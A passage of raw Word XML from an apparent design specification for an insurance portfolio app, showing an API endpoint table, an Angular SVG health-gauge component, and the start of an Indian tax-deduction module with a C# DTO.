              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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/api/portfoliohealth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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UserOrAdmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Returns health score for selected members</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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/api/portfoliohealth/factors</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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UserOrAdmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="316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Returns individual factor breakdown</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1.4  Angular Component — portfolio-health-gauge.component.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">New standalone component using SVG to render an animated radial progress gauge. Add to dashboard.component.ts imports.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">@Component({</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  selector: "app-health-gauge",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  standalone: true,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  imports: [CommonModule],</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  template: `</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;div class="gauge-container"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;svg viewBox="0 0 200 120" class="gauge-svg"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;!-- Background arc --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;path d="M 20 100 A 80 80 0 0 1 180 100"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">              fill="none" stroke="var(--border-subtle)" stroke-width="16"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">              stroke-linecap="round"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;!-- Animated score arc --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;path [attr.d]="getArcPath()"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">              fill="none" [attr.stroke]="getScoreColor()"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">              stroke-width="16" stroke-linecap="round"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">              class="gauge-progress"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;!-- Score text --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;text x="100" y="95" text-anchor="middle"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">              class="gauge-score"&gt;{{ score }}&lt;/text&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;text x="100" y="115" text-anchor="middle"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">              class="gauge-label"&gt;{{ grade }}&lt;/text&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;/svg&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/div&gt;</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">export class PortfolioHealthGaugeComponent {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  @Input() score = 0;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  @Input() grade = "";</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getArcPath(): string {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    const angle = (this.score / 100) * 180;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    const rad   = (angle - 180) * (Math.PI / 180);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    const x     = 100 + 80 * Math.cos(rad);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    const y     = 100 + 80 * Math.sin(rad);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    return `M 20 100 A 80 80 0 ${angle &gt; 90 ? 1 : 0} 1 ${x} ${y}`;</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getScoreColor(): string {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (this.score &gt;= 80) return "#10B981";  // emerald</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (this.score &gt;= 60) return "#F59E0B";  // amber</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    return "#EF4444";                          // rose</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec4-2" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2  Tax Intelligence Module</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">India-specific tax benefit calculator covering Section 80C (life insurance premiums up to ₹1.5L), Section 80D (health insurance), and Section 10(10D) (maturity exemption). New route: /tax-planner.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2.1  New DTOs — TaxSummaryDto.cs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">public class TaxSummaryDto</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    public decimal Section80CDeduction    { get; set; }  // Min(lifePremiums, 150000)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    public decimal Section80DDeduction    { get; set; }  // Min(healthPremiums, 25000)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    public decimal TotalDeductions        { get; set; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    public decimal EstimatedTaxSaving     { get; set; }  // At 30% slab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
